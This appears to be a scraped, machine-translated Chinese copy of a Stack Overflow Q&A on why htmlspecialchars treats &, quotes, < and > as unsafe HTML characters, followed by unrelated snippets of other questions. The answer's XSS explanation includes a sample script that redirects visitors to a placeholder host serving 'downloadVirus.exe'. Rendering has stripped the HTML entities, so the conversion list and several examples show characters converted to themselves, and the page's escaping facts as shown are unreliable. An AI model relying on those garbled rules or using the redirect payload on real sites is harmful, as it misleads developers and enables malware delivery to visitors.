- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
在PHP 中,有一个函数叫做htmlspecialchars()。对字符串执行以下替换:
&
(&符号)转换为 &
"
(双引号)转换为 "
'
(单引号)转换为 '
(仅当设置标志 ENT_QUOTES 时)<
(小于)转换为 <
>
(大于)转换为 >
显然,这样做是因为这 5 个特定字符是不安全的 HTML 字符。
我能理解为什么最后两个被认为是不安全的:如果它们只是“回显”,则可以传递任意/危险的 HTML,包括带有 <script>
的潜在 javascript等等。
问题 1. 为什么前三个字符(& 符号、双引号、单引号)也被视为“不安全”?
另外,我偶然发现了this library called "he" on GitHub (by Mathias Bynens) ,这是关于编码/解码 HTML 实体。在那里,我发现了以下内容:
[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]
( source )
问题 2. 是否有充分的理由将反引号视为另一个不安全的 HTML 字符?如果是,是否意味着上述 PHP 函数已过时?
最后,所有这些都引出了一个问题:
问题 3。除了上面提到的 5/6 个字符之外,还有其他字符应该被视为“不安全”吗?
最佳答案
Donovan_D 的回答几乎解释了这一点,但我将在此处提供一些示例,说明具体这些特定字符如何导致问题。
这些字符被认为是不安全的,因为它们是执行 XSS(跨站点脚本)攻击(或因无辜输入而意外破坏页面)的最明显方式。
考虑网站上的评论功能。您提交带有文本区域的表单。它被保存到数据库中,然后显示在所有访问者的页面上。
现在我提交一个看起来像这样的评论。
<script type="text/javascript">
window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>
突然间,访问您页面的每个人都被重定向到病毒下载。这里天真的方法只是说,好吧,那么让我们过滤掉该攻击中的一些重要字符:
<
和 >
将替换为 <
和 >
现在突然间我们的脚本不再是脚本了。这只是一些看起来像 html 的文本。
类似的情况会出现类似的评论
Something is <<wrong>> here.
假设用户使用了 <<...>>
出于某种原因强调。他们的评论将呈现为
Something is <> here.
显然不是理想的行为。
&
出现了一种不太恶意的情况. &
用于表示 HTML 实体,例如 &
和 "
和 <
等等。因此,看起来无辜的文本很容易意外地成为 html 实体,最终对用户来说看起来非常不同且非常奇怪。
考虑评论
I really like #455 ó please let me know when they're available for purchase.
这将呈现为
I really like #455 ó please let me know when they're available for purchase.
显然不是预期的行为。
关键是,这些符号在大多数情况下被认为是防止大多数 XSS 漏洞/错误的关键,因为它们很可能用于有效输入,但需要转义才能在 HTML 中正确呈现。
关于你的第二个问题,我个人并不知道反引号应该被视为不安全的 HTML 字符的任何方式。
至于你的第三个,也许吧。不要依赖黑名单来过滤用户输入。相反,使用已知 OK 输入的白名单并从那里开始工作。
关于html - 为什么这 5(6?)个字符被视为 "unsafe"HTML 字符?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/42728605/
将“”转换为“>”的主要目的是避免以下内联脚本: var foo = "alert('bug');"; // the value of foo is generated from server
我有以下想法: 在德语中我们有四个额外的字母(ä、ö、ü、ß),我不知道任何其他语言有这些声音,但我认为有口音的法国人也知道这个问题。我们在 Google Play 商店中有很多适用于城市、公交车站、
#!/bin/bash read nameArg find -name "$nameArg" 使用此代码,当我输入例如 *.txt 时,它将为我提供以 txt 结尾的所有文件,但我只想要名称为 *.t
我在 MySQL 5.7.27 中有一个带有 utf8mb4_unicode_ci 排序规则的用户表。 不幸的是, ı 没有像 i 那样进行线程化,例如,以下查询将找不到 Yılmaz select
我的简单 MySQL 查询: SELECT `word` FROM `nouns` WHERE `word` LIKE 'vandenys' 返回: vandenis 但是“vandenYs
虽然我以前用过这样的代码,而且很明显编译器有足够的信息可以工作,但我真的不明白为什么会这样编译: template auto foo(const T& t, I i) { return st
如何实现一个以 int 开头的函数,并在每次(经历有限数量的可能性)返回 1 的几个(例如,5 个) bool 值之一时从中减去 1。 理想情况下的外观是: function list1 list2
因此,如果我的数据库中有一个包含值的表 1 2 3 4 NULL 我执行了查询 SELECT MAX(col1) FROM 我会得到 4。有什么办法可以改变这个,所以 Null 将被视为最大值而不是
例如:我在数据库中有一条记录:[Example] Attena Illusive - 01 [720p].mkv尝试使用查询进行搜索: SELECT ts_rank_cd(to_tsvector('
我试图创建 2 个简单的盒子,并允许用户从 1 个盒子中选择数据,然后将其复制到第二个盒子。如果第二个框中已经有相同的文本,请在后面附加一些简单的文本。 它基本上在该项目不在第二个框中时起作用。但是,
这个问题已经有答案了: How to read a file from jar in Java? (6 个回答) 已关闭10 年前。 我想从我的 *jar 存档中读取文件。我在互联网上阅读了如何从 z
我在 Javascript 中偶然发现了一个我无法理解的极其奇怪的事件。 这是一个非常简单的 if 语句: let hours = 20; 我在这里设置了一个断点,并在调试器中设置了hours = 0
这两个查询给出了完全相同的结果: select * from topics where name='Harligt'; select * from topics where name='Härligt
我有一个包含数值和 NaN 的表格。求和时,如果所选值包含 NaN,则结果将为 NaN。有没有办法让 postgresql 在求和时将它们视为 0 而不是 NaN?或者我只需要将表中的所有 NaN 转
我有一个正在构建的页面,我希望当我滚动(向上或向下)页面时滚动到下一个 div(每个 div 是窗口高度的 100%)。并在那里“固定”,直到您再次滚动。可以在此处看到我正在努力完成的示例: http
我正在用 Javascript 制作一个小的 HTML 页面。它不需要服务器端,但我需要存储这个人所做的事情,所以我正在使用 localStorage。( list ) 如今,浏览器可以选择不存储 c
这两个查询给了我完全相同的结果: select * from topics where name='Harligt'; select * from topics where name='Härligt
我想向 Lua 公开一些 C++ 类。我可以调用Widget:New()获取带有元表集的返回用户数据到表 WidgetMeta . WidgetMeta包含所有 C++ 函数,它是 __index设置
我正在使用一个大型的旧数据库,现在我尝试使用 hibernate 而不是 SQL 来访问它。更大的问题之一是在外键中无限制地使用“0”和“-1”(意思是“NULL”)。 我生成了很多代码,但我手动添加
我试图将一个数字传递到一个 BYTES 数组中 - 但将该数字视为一个字符数组。这是我的代码: for(int i=1;i<=totalFiles;i++) { BYTE* input = n
我是一名优秀的程序员,十分优秀!